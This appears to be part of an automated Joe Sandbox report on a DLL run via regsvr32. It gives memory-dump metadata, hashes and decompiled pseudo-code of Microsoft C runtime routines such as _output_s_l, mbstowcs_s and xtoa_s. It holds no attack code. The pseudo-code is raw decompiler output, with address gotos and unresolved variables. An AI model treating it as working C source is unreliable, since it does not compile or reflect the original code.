
                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-1870338870
                                    • Opcode ID: 677b85930a9a5e10114940793937fb41496cbdaf58dc4485b8ee00e4ca785de0
                                    • Instruction ID: 99087f23451225b4f7ab5820d3e4ac0e5e7a5016f389c9197bb40e17ebc05c44
                                    • Opcode Fuzzy Hash: 677b85930a9a5e10114940793937fb41496cbdaf58dc4485b8ee00e4ca785de0
                                    • Instruction Fuzzy Hash: 4ED11972A0CAC28AE7B09F64E8447AEB6E0F380349F604125D6CD47AE9DB7ED545CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 19%
                                    			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                    				signed int _t223;
                                    				signed char _t228;
                                    				intOrPtr _t263;
                                    				signed int _t338;
                                    				signed int _t339;
                                    				signed long long _t342;
                                    				intOrPtr* _t365;
                                    				signed long long _t390;
                                    
                                    				_t338 = __rax;
                                    				_a80 = _a80 | 0x00000040;
                                    				_a72 = 0xa;
                                    				_a72 = 0xa;
                                    				_a116 = 0x10;
                                    				asm("bts eax, 0xf");
                                    				_a708 = 7;
                                    				_a708 = 0x27;
                                    				_a72 = 0x10;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                    				_a84 = 0x30;
                                    				_a85 = _a708 + 0x51;
                                    				_a92 = 2;
                                    				_a72 = 8;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                    				asm("bts eax, 0x9");
                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                    				E000007FE7FEF9D31EA0( &_a1112);
                                    				_a824 = _t338;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                    				E000007FE7FEF9D31EA0( &_a1112);
                                    				_a824 = _t338;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                    				_t339 = E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t339;
                                    				goto 0xf9d3c80e;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t339;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t339;
                                    				goto 0xf9d3c84b;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t339;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                    				if (_a824 >= 0) goto 0xf9d3c882;
                                    				_a832 =  ~_a824;
                                    				asm("bts eax, 0x8");
                                    				goto 0xf9d3c892;
                                    				_t342 = _a824;
                                    				_a832 = _t342;
                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                    				_a832 = _a832 & _t342;
                                    				if (_a116 >= 0) goto 0xf9d3c8d8;
                                    				_a116 = 1;
                                    				goto 0xf9d3c8f5;
                                    				_a80 = _a80 & 0xfffffff7;
                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                    				_a116 = 0x200;
                                    				if (_a832 != 0) goto 0xf9d3c908;
                                    				_a92 = 0;
                                    				_a64 =  &_a687;
                                    				_t223 = _a116;
                                    				_a116 = _a116 - 1;
                                    				if (_t223 > 0) goto 0xf9d3c936;
                                    				if (_a832 == 0) goto 0xf9d3c9d3;
                                    				_a1040 = _a72;
                                    				_a816 = _t223 / _a1040 + 0x30;
                                    				_a1048 = _a72;
                                    				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                    				_t228 = _a816 + _a708;
                                    				_a816 = _t228;
                                    				 *_a64 = _a816 & 0x000000ff;
                                    				_a64 = _a64 - 1;
                                    				goto 0xf9d3c915;
                                    				_a104 = _t228;
                                    				_a64 = _a64 + 1;
                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                    				if (_a104 == 0) goto 0xf9d3ca12;
                                    				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                    				_a64 = _a64 - 1;
                                    				 *_a64 = 0x30;
                                    				_a104 = _a104 + 1;
                                    				if (_a108 != 0) goto 0xf9d3cc6e;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                    				_a84 = 0x2d;
                                    				_a92 = 1;
                                    				goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                    				_a84 = 0x2b;
                                    				_a92 = 1;
                                    				goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                    				_a84 = 0x20;
                                    				_a92 = 1;
                                    				_a840 = _a88 - _a104 - _a92;
                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                    				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                    				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                    				if (_a76 == 0) goto 0xf9d3cc1d;
                                    				if (_a104 <= 0) goto 0xf9d3cc1d;
                                    				_a872 = 0;
                                    				_a848 = _a64;
                                    				_a856 = _a104;
                                    				_a856 = _a856 - 1;
                                    				if (_a856 == 0) goto 0xf9d3cc1b;
                                    				_a1056 =  *_a848 & 0x0000ffff;
                                    				r9d = _a1056 & 0x0000ffff;
                                    				r8d = 6;
                                    				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                    				_a848 =  &(_a848[1]);
                                    				if (_a872 != 0) goto 0xf9d3cbe5;
                                    				if (_a860 != 0) goto 0xf9d3cbf2;
                                    				_a688 = 0xffffffff;
                                    				goto 0xf9d3cc1b;
                                    				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                    				goto 0xf9d3cb60;
                                    				goto 0xf9d3cc3b;
                                    				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                    				if (_a688 < 0) goto 0xf9d3cc6e;
                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                    				if (_a96 == 0) goto 0xf9d3cc8e;
                                    				0xf9d25330();
                                    				_a96 = 0;
                                    				goto 0xf9d3b99c;
                                    				if (_a704 == 0) goto 0xf9d3ccb4;
                                    				if (_a704 == 7) goto 0xf9d3ccb4;
                                    				_a1060 = 0;
                                    				goto 0xf9d3ccbf;
                                    				_a1060 = 1;
                                    				_t263 = _a1060;
                                    				_a876 = _t263;
                                    				if (_a876 != 0) goto 0xf9d3cd05;
                                    				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                    				_a32 = _t365;
                                    				r9d = 0;
                                    				r8d = 0x8f5;
                                    				0xf9d2b3b0();
                                    				if (_t263 != 1) goto 0xf9d3cd05;
                                    				asm("int3");
                                    				if (_a876 != 0) goto 0xf9d3cd61;
                                    				0xf9d2ab30();
                                    				 *_t365 = 0x16;
                                    				_a32 = 0;
                                    				r9d = 0x8f5;
                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    				_a912 = 0xffffffff;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				goto 0xf9d3cd80;
                                    				_a916 = _a688;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    			}












                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg$wctomb_s
                                    • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2984758162-268265396
                                    • Opcode ID: 61945b808d8ddeeab049de188114ad7d55d89a3558f0f9168201042d10a77149
                                    • Instruction ID: 3d46b7cc479ec5e1b64121366563b1e191facb976c601abf34f32c88bb47aca1
                                    • Opcode Fuzzy Hash: 61945b808d8ddeeab049de188114ad7d55d89a3558f0f9168201042d10a77149
                                    • Instruction Fuzzy Hash: 8202ED7260CBC186E7B1CB25E8857AEB7E4F384795F200125EACD86AA9DB7DD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                    • API String ID: 2192614184-660564692
                                    • Opcode ID: 51ea2d8a29ec6a42f4206cddb2a15a761283d0351a467ffd0ee92275139e1829
                                    • Instruction ID: 0047506df9643dfb2240c3b63e02d4c6faf0d454733b2a9523d16aca39b446dd
                                    • Opcode Fuzzy Hash: 51ea2d8a29ec6a42f4206cddb2a15a761283d0351a467ffd0ee92275139e1829
                                    • Instruction Fuzzy Hash: E5E10B32A0DBC685E7B09B14E8457AEA3E0F384794FA04625D6DD53AE8DF7ED484CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 57%
                                    			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
                                    				long long _v24;
                                    				long long _v32;
                                    				long long _v40;
                                    				long long _v48;
                                    				long long _v56;
                                    				void* _v64;
                                    				long long _v72;
                                    				void* _t88;
                                    				void* _t89;
                                    				void* _t107;
                                    				void* _t109;
                                    				signed int* _t158;
                                    				signed int* _t160;
                                    				long long _t175;
                                    				long long _t186;
                                    				signed int* _t187;
                                    				signed int* _t193;
                                    
                                    				_a32 = __r9;
                                    				_a24 = __r8;
                                    				_a16 = __rdx;
                                    				_a8 = __rcx;
                                    				_v72 = 0;
                                    				_t158 = _a24;
                                    				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
                                    				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
                                    				_v56 = _t158 + _a24[1];
                                    				goto 0xf9d35642;
                                    				_v56 = 0;
                                    				if (_v56 == 0) goto 0xf9d356aa;
                                    				_t160 = _a24;
                                    				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
                                    				E000007FE7FEF9D2E680(_t89, _t160);
                                    				_v48 = _t160 + _a24[1];
                                    				goto 0xf9d3567c;
                                    				_v48 = 0;
                                    				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
                                    				if (_a24[2] != 0) goto 0xf9d356b1;
                                    				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
                                    				goto 0xf9d35966;
                                    				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
                                    				_v64 = _a16;
                                    				goto 0xf9d356e9;
                                    				_v64 = _a24[2] +  *_a16;
                                    				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
                                    				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
                                    				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
                                    				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
                                    				_t175 = _v64;
                                    				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
                                    				 *_v64 = _t175;
                                    				goto 0xf9d35760;
                                    				E000007FE7FEF9D2CF80(_t175);
                                    				goto 0xf9d3595a;
                                    				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
                                    				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
                                    				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
                                    				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
                                    				if (_a32[5] != 8) goto 0xf9d35807;
                                    				if ( *_v64 == 0) goto 0xf9d35807;
                                    				_t186 = _v64;
                                    				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
                                    				 *_v64 = _t186;
                                    				goto 0xf9d3580e;
                                    				_t109 = E000007FE7FEF9D2CF80(_t186);
                                    				goto 0xf9d3595a;
                                    				_t187 = _a32;
                                    				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
                                    				E000007FE7FEF9D2E6A0(_t109, _t187);
                                    				_v40 = _t187 + _a32[6];
                                    				goto 0xf9d35845;
                                    				_v40 = 0;
                                    				if (_v40 != 0) goto 0xf9d358c6;
                                    				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
                                    				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
                                    				_t191 = _a32[5];
                                    				_v32 = _a32[5];
                                    				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
                                    				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
                                    				goto 0xf9d358c1;
                                    				E000007FE7FEF9D2CF80(_t191);
                                    				goto 0xf9d3595a;
                                    				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
                                    				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
                                    				_t193 = _a32;
                                    				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
                                    				E000007FE7FEF9D2E6A0(_t117, _t193);
                                    				_v24 = _t193 + _a32[6];
                                    				goto 0xf9d35922;
                                    				_v24 = 0;
                                    				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
                                    				_t195 = _a32;
                                    				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
                                    				_v72 = 2;
                                    				goto 0xf9d35953;
                                    				_v72 = 1;
                                    				goto 0xf9d3595a;
                                    				E000007FE7FEF9D2CF80(_a32);
                                    				E000007FE7FEF9D2CF50(_t195);
                                    				return _v72;
                                    			}





















                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                    • String ID:
                                    • API String ID: 801082872-0
                                    • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                    • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                    • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                    • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                    • API String ID: 2123368286-1993839260
                                    • Opcode ID: 758167781a4fb66a58f740ebc537b1c9f8383254a932b9fe6e590f504f1f2882
                                    • Instruction ID: 118e4e4707969e3dac6bf015ec0fe9163e407fa4248f5c8d89799a475a93b5a4
                                    • Opcode Fuzzy Hash: 758167781a4fb66a58f740ebc537b1c9f8383254a932b9fe6e590f504f1f2882
                                    • Instruction Fuzzy Hash: 49E11B72A1CB86CAE7A08B18E8447AEB3E1F384755F604525E6CD43BB8DB7ED444CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                    • API String ID: 2123368286-1853640030
                                    • Opcode ID: 820d6638ce8c2bc49aeb15d9bb45941f698caf6262644320b28b67af79be84a6
                                    • Instruction ID: 2769aadc75a8f45e94697a4dd9f042802452aa73cd8bd2afe7c03a6eee30acd9
                                    • Opcode Fuzzy Hash: 820d6638ce8c2bc49aeb15d9bb45941f698caf6262644320b28b67af79be84a6
                                    • Instruction Fuzzy Hash: D7E12A32A1DB86CAE7A08B59E8447AEB7E1F385354F604125E6CD43BB8DB7ED444CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 22%
                                    			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                    				signed int _t224;
                                    				signed char _t229;
                                    				void* _t260;
                                    				intOrPtr _t268;
                                    				signed int _t342;
                                    				signed int _t343;
                                    				signed long long _t346;
                                    				intOrPtr* _t365;
                                    				intOrPtr* _t370;
                                    				signed long long _t400;
                                    
                                    				_t342 = __rax;
                                    				_a80 = _a80 | 0x00000040;
                                    				_a72 = 0xa;
                                    				_a72 = 0xa;
                                    				_a116 = 0x10;
                                    				asm("bts eax, 0xf");
                                    				_a1220 = 7;
                                    				_a1220 = 0x27;
                                    				_a72 = 0x10;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                    				_a84 = 0x30;
                                    				_a86 = _a1220 + 0x51;
                                    				_a92 = 2;
                                    				_a72 = 8;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                    				asm("bts eax, 0x9");
                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                    				E000007FE7FEF9D31EA0( &_a1560);
                                    				_a1304 = _t342;
                                    				goto 0xf9d3e844;
                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                    				E000007FE7FEF9D31EA0( &_a1560);
                                    				_a1304 = _t342;
                                    				goto 0xf9d3e844;
                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                    				_t343 = E000007FE7FEF9D31E40( &_a1560);
                                    				_a1304 = _t343;
                                    				goto 0xf9d3e807;
                                    				E000007FE7FEF9D31E40( &_a1560);
                                    				_a1304 = _t343;
                                    				goto 0xf9d3e844;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                    				E000007FE7FEF9D31E40( &_a1560);
                                    				_a1304 = _t343;
                                    				goto 0xf9d3e844;
                                    				E000007FE7FEF9D31E40( &_a1560);
                                    				_a1304 = _t343;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                    				if (_a1304 >= 0) goto 0xf9d3e87b;
                                    				_a1312 =  ~_a1304;
                                    				asm("bts eax, 0x8");
                                    				goto 0xf9d3e88b;
                                    				_t346 = _a1304;
                                    				_a1312 = _t346;
                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                    				_a1312 = _a1312 & _t346;
                                    				if (_a116 >= 0) goto 0xf9d3e8d1;
                                    				_a116 = 1;
                                    				goto 0xf9d3e8ee;
                                    				_a80 = _a80 & 0xfffffff7;
                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                    				_a116 = 0x200;
                                    				if (_a1312 != 0) goto 0xf9d3e901;
                                    				_a92 = 0;
                                    				_a64 =  &_a687;
                                    				_t224 = _a116;
                                    				_a116 = _a116 - 1;
                                    				if (_t224 > 0) goto 0xf9d3e92f;
                                    				if (_a1312 == 0) goto 0xf9d3e9cc;
                                    				_a1480 = _a72;
                                    				_a1296 = _t224 / _a1480 + 0x30;
                                    				_a1488 = _a72;
                                    				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                    				_t229 = _a1296 + _a1220;
                                    				_a1296 = _t229;
                                    				 *_a64 = _a1296 & 0x000000ff;
                                    				_a64 = _a64 - 1;
                                    				goto 0xf9d3e90e;
                                    				_a104 = _t229;
                                    				_a64 = _a64 + 1;
                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                    				if (_a104 == 0) goto 0xf9d3ea0b;
                                    				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                    				_a64 = _a64 - 1;
                                    				 *_a64 = 0x30;
                                    				_a104 = _a104 + 1;
                                    				if (_a108 != 0) goto 0xf9d3ec7c;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                    				_a84 = 0x2d;
                                    				_a92 = 1;
                                    				goto 0xf9d3ea9d;
                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                    				_a84 = 0x2b;
                                    				_a92 = 1;
                                    				goto 0xf9d3ea9d;
                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                    				_a84 = 0x20;
                                    				_a92 = 1;
                                    				_a1320 = _a88 - _a104 - _a92;
                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                    				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                    				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                    				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                    				if (_a76 != 0) goto 0xf9d3ec29;
                                    				if (_a104 <= 0) goto 0xf9d3ec29;
                                    				_t365 = _a64;
                                    				_a1328 = _t365;
                                    				_a1336 = _a104;
                                    				_a1336 = _a1336 - 1;
                                    				if (_a1336 <= 0) goto 0xf9d3ec27;
                                    				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                    				_a1496 = _t365;
                                    				E000007FE7FEF9D26840(_t260,  &_a120);
                                    				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
                                    				if (_a1340 > 0) goto 0xf9d3ebe7;
                                    				_a1200 = 0xffffffff;
                                    				goto 0xf9d3ec27;
                                    				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                    				_a1328 = _a1328 + _a1340;
                                    				goto 0xf9d3eb61;
                                    				goto 0xf9d3ec47;
                                    				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                    				if (_a1200 < 0) goto 0xf9d3ec7c;
                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                    				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                    				if (_a96 == 0) goto 0xf9d3ec9c;
                                    				0xf9d25330();
                                    				_a96 = 0;
                                    				goto 0xf9d3da75;
                                    				if (_a1216 == 0) goto 0xf9d3ecc2;
                                    				if (_a1216 == 7) goto 0xf9d3ecc2;
                                    				_a1504 = 0;
                                    				goto 0xf9d3eccd;
                                    				_a1504 = 1;
                                    				_t268 = _a1504;
                                    				_a1344 = _t268;
